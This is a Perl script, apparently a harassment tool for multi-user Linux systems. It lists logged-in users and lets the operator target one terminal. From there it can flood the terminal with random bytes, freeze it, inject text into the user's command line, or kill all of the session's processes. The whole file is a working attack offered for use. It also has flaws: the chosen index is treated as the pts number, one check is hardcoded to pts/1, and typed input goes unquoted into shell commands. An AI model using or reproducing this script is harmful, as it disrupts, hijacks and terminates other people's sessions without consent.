#!/usr/bin/perl
#use strict;
#use warnings;

my @users = qx(who);
my @targets;
#because the user may be logged in more than once, we will split the arrays into seperate lists rather than hashes
foreach my $item (@users) {
  @temp = split / /, $item;
  foreach my $user_and_pty (@temp) {
    if($user_and_pty =~ "^[a-zA-Z]"){
    push (@targets,$user_and_pty);
    }
  }
}
my @user_list;
my @term_list;
foreach my $item (@targets) {
  if($item =~ "pts") {
  push(@term_list, $item);
  } else {
    push (@user_list, $item);
    }
}

my $size = @user_list;
my $i = 0;

print "users | tty\n";
print "-----------\n";
while ($i < $size) {
	print "$i: @user_list[$i]    @term_list[$i]\n";
	$i++;
}

print "\nenter a target number\n";
my $target_num = <>;
chomp $target_num;
if($target_num > $i - 1){
  print "invalid number\n";
}

print "action required\n";

print "Enter 1 to fuzz a session\n";
print "Enter 2 to freeze a session\n";
print "Enter 3 to send messages to a term\n";
print "Enter 4 to type direct to a command line feed\n";
print "Enter 5 to kill a session\n";


my $sel = <>;
chomp $sel;

if ($sel ne "1" && $sel ne "2" && $sel ne "3" && $sel ne "4" && $sel ne "5") {
  exit (0);
}

print "terminal is pts $target_num and option is $sel\n";

if($sel eq "1"){
  print "fuzzing /dev/pts/$target_num\n";
  print "press CTRL+C to stop\n";
  system("cat /dev/urandom > /dev/pts/$target_num");
}

if($sel eq "2"){
  print "freezing /dev/pts/$target_num\n";
  print "press CTRL+C to stop\n";
  system("cat /dev/pts/$target_num /dev/pts/$target_num /dev/pts/$target_num");
}

if($sel eq "3"){
  print "starting message sending to /dev/pts/$target_num\n";
  print "press CTRL+C to stop\n";
  while(1) {
    my $ input = <>;
    chomp $input;
    system("echo $input > /dev/pts/$target_num");
    }
}

if($sel eq "4"){
  print "starting message send on command line to /dev/pts/$target_num\n";
  print "press CTRL+C to stop\n";
  while(1) {
    my $ input = <>;
    chomp $input;
    system("echo -n $input > /dev/pts/$target_num");
    }
}

if($sel eq "5"){
  print "soft or hard kill?\n";
  print "enter [soft] or [hard]\n";
  my $kill_choice = <>;
  chomp $kill_choice;
  if($kill_choice ne "soft" && $kill_choice ne "hard") {
    exit(0);
  }
  print "killing user session\n\n";
  my $command = "ps -aux|egrep -vi \"grep\" | egrep \"pts/$target_num\" | awk '{print \$2}'";
  my @pids = qx($command);
  foreach (@pids) {
    chomp $_;
    my $xx = qx(ps $_);
    print "Killing: $xx \n";
    #hard kill
    if($kill_choice eq "soft"){
      print "soft kill\n";
      system("kill -15 $_");
      print "----------\n";
    } 
    if($kill_choice eq "hard"){
      print "hard kill\n";
      system("kill -9 $_");
      print "----------\n";
    }
  my $result = qx(who | grep "pts/1" && echo "user still exists" || echo "user gone");
  print $result, "\n";
  }
}
